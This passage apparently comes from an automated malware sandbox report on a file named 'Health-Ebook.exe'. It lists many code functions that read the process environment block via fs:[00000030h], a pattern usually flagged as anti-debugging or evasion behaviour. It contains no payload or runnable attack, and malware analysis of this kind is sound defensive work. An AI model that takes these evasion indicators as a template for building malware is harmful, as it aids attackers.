Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53DE50 mov eax, dword ptr fs:[00000030h]2_2_1F53DE50
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F545651 mov eax, dword ptr fs:[00000030h]2_2_1F545651
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F545651 mov eax, dword ptr fs:[00000030h]2_2_1F545651
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D7E40 mov eax, dword ptr fs:[00000030h]2_2_1F5D7E40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50CE70 mov ecx, dword ptr fs:[00000030h]2_2_1F50CE70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]2_2_1F535E70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]2_2_1F535E70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]2_2_1F535E70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F535E70 mov eax, dword ptr fs:[00000030h]2_2_1F535E70
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53A675 mov eax, dword ptr fs:[00000030h]2_2_1F53A675
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]2_2_1F534E61
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]2_2_1F534E61
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F534E61 mov eax, dword ptr fs:[00000030h]2_2_1F534E61
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F532616 mov eax, dword ptr fs:[00000030h]2_2_1F532616
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]2_2_1F58660A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]2_2_1F58660A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]2_2_1F58660A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58660A mov eax, dword ptr fs:[00000030h]2_2_1F58660A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F522600 mov eax, dword ptr fs:[00000030h]2_2_1F522600
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C1606 mov eax, dword ptr fs:[00000030h]2_2_1F5C1606
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50A60B mov eax, dword ptr fs:[00000030h]2_2_1F50A60B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50A60B mov eax, dword ptr fs:[00000030h]2_2_1F50A60B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52FE37 mov eax, dword ptr fs:[00000030h]2_2_1F52FE37
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53CE34 mov eax, dword ptr fs:[00000030h]2_2_1F53CE34
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53CE34 mov eax, dword ptr fs:[00000030h]2_2_1F53CE34
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F501638 mov eax, dword ptr fs:[00000030h]2_2_1F501638
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F59BE30 mov eax, dword ptr fs:[00000030h]2_2_1F59BE30
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F59BE30 mov eax, dword ptr fs:[00000030h]2_2_1F59BE30
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D9623 mov eax, dword ptr fs:[00000030h]2_2_1F5D9623
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5466D0 mov eax, dword ptr fs:[00000030h]2_2_1F5466D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0EFB mov eax, dword ptr fs:[00000030h]2_2_1F5C0EFB
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504EFE mov eax, dword ptr fs:[00000030h]2_2_1F504EFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F504EFE mov eax, dword ptr fs:[00000030h]2_2_1F504EFE
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5316E5 mov eax, dword ptr fs:[00000030h]2_2_1F5316E5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5316E5 mov eax, dword ptr fs:[00000030h]2_2_1F5316E5
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50C692 mov eax, dword ptr fs:[00000030h]2_2_1F50C692
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D969E mov eax, dword ptr fs:[00000030h]2_2_1F5D969E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C3E96 mov eax, dword ptr fs:[00000030h]2_2_1F5C3E96
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]2_2_1F543E9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]2_2_1F543E9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F543E9A mov eax, dword ptr fs:[00000030h]2_2_1F543E9A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516682 mov eax, dword ptr fs:[00000030h]2_2_1F516682
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5366B4 mov eax, dword ptr fs:[00000030h]2_2_1F5366B4
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503EA0 mov eax, dword ptr fs:[00000030h]2_2_1F503EA0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F503EA0 mov eax, dword ptr fs:[00000030h]2_2_1F503EA0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D86A9 mov eax, dword ptr fs:[00000030h]2_2_1F5D86A9
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]2_2_1F595D55
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]2_2_1F595D55
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F595D55 mov eax, dword ptr fs:[00000030h]2_2_1F595D55
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53056B mov eax, dword ptr fs:[00000030h]2_2_1F53056B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50356C mov eax, dword ptr fs:[00000030h]2_2_1F50356C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50356C mov eax, dword ptr fs:[00000030h]2_2_1F50356C
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0D1B mov eax, dword ptr fs:[00000030h]2_2_1F5C0D1B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593D10 mov eax, dword ptr fs:[00000030h]2_2_1F593D10
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521530 mov eax, dword ptr fs:[00000030h]2_2_1F521530
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D952E mov eax, dword ptr fs:[00000030h]2_2_1F5D952E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53E52F mov ecx, dword ptr fs:[00000030h]2_2_1F53E52F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53E52F mov eax, dword ptr fs:[00000030h]2_2_1F53E52F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53E52F mov eax, dword ptr fs:[00000030h]2_2_1F53E52F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5095C0 mov eax, dword ptr fs:[00000030h]2_2_1F5095C0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5095C0 mov ecx, dword ptr fs:[00000030h]2_2_1F5095C0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584DCA mov eax, dword ptr fs:[00000030h]2_2_1F584DCA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F584DCA mov eax, dword ptr fs:[00000030h]2_2_1F584DCA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]2_2_1F5D6DFD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]2_2_1F5D6DFD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D6DFD mov eax, dword ptr fs:[00000030h]2_2_1F5D6DFD
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5375F0 mov eax, dword ptr fs:[00000030h]2_2_1F5375F0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5375F0 mov eax, dword ptr fs:[00000030h]2_2_1F5375F0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F532DF0 mov eax, dword ptr fs:[00000030h]2_2_1F532DF0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F516DE1 mov eax, dword ptr fs:[00000030h]2_2_1F516DE1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5015E1 mov eax, dword ptr fs:[00000030h]2_2_1F5015E1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D85EA mov eax, dword ptr fs:[00000030h]2_2_1F5D85EA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B1DE3 mov ecx, dword ptr fs:[00000030h]2_2_1F5B1DE3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B1DE3 mov ecx, dword ptr fs:[00000030h]2_2_1F5B1DE3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5B1DE3 mov eax, dword ptr fs:[00000030h]2_2_1F5B1DE3
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]2_2_1F52F591
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]2_2_1F52F591
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F591 mov eax, dword ptr fs:[00000030h]2_2_1F52F591
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D5595 mov eax, dword ptr fs:[00000030h]2_2_1F5D5595
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]2_2_1F521D9D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]2_2_1F521D9D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]2_2_1F521D9D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]2_2_1F521D9D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521D9D mov eax, dword ptr fs:[00000030h]2_2_1F521D9D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AE58A mov ecx, dword ptr fs:[00000030h]2_2_1F5AE58A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]2_2_1F5AE58A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]2_2_1F5AE58A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5AE58A mov eax, dword ptr fs:[00000030h]2_2_1F5AE58A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D8589 mov eax, dword ptr fs:[00000030h]2_2_1F5D8589
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0D8A mov eax, dword ptr fs:[00000030h]2_2_1F5C0D8A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F530584 mov eax, dword ptr fs:[00000030h]2_2_1F530584
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE581 mov eax, dword ptr fs:[00000030h]2_2_1F5CE581
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5035B1 mov eax, dword ptr fs:[00000030h]2_2_1F5035B1
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C15A8 mov eax, dword ptr fs:[00000030h]2_2_1F5C15A8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F502DAA mov eax, dword ptr fs:[00000030h]2_2_1F502DAA
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F549DAF mov eax, dword ptr fs:[00000030h]2_2_1F549DAF
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C145F mov eax, dword ptr fs:[00000030h]2_2_1F5C145F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CE455 mov eax, dword ptr fs:[00000030h]2_2_1F5CE455
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53245F mov eax, dword ptr fs:[00000030h]2_2_1F53245F
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5D8452 mov eax, dword ptr fs:[00000030h]2_2_1F5D8452
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593C47 mov eax, dword ptr fs:[00000030h]2_2_1F593C47
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC77 mov eax, dword ptr fs:[00000030h]2_2_1F51EC77
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53547E mov eax, dword ptr fs:[00000030h]2_2_1F53547E
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F527C7D mov eax, dword ptr fs:[00000030h]2_2_1F527C7D
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F58E460 mov eax, dword ptr fs:[00000030h]2_2_1F58E460
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BAC60 mov eax, dword ptr fs:[00000030h]2_2_1F5BAC60
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5BAC60 mov eax, dword ptr fs:[00000030h]2_2_1F5BAC60
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50646B mov eax, dword ptr fs:[00000030h]2_2_1F50646B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F50646B mov eax, dword ptr fs:[00000030h]2_2_1F50646B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F521410 mov ecx, dword ptr fs:[00000030h]2_2_1F521410
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F53341B mov eax, dword ptr fs:[00000030h]2_2_1F53341B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CA416 mov eax, dword ptr fs:[00000030h]2_2_1F5CA416
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5CA416 mov eax, dword ptr fs:[00000030h]2_2_1F5CA416
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51EC01 mov eax, dword ptr fs:[00000030h]2_2_1F51EC01
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F501C09 mov eax, dword ptr fs:[00000030h]2_2_1F501C09
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F593C38 mov eax, dword ptr fs:[00000030h]2_2_1F593C38
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F530430 mov eax, dword ptr fs:[00000030h]2_2_1F530430
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F51A423 mov eax, dword ptr fs:[00000030h]2_2_1F51A423
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F5C0C29 mov eax, dword ptr fs:[00000030h]2_2_1F5C0C29
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F52F42B mov eax, dword ptr fs:[00000030h]2_2_1F52F42B
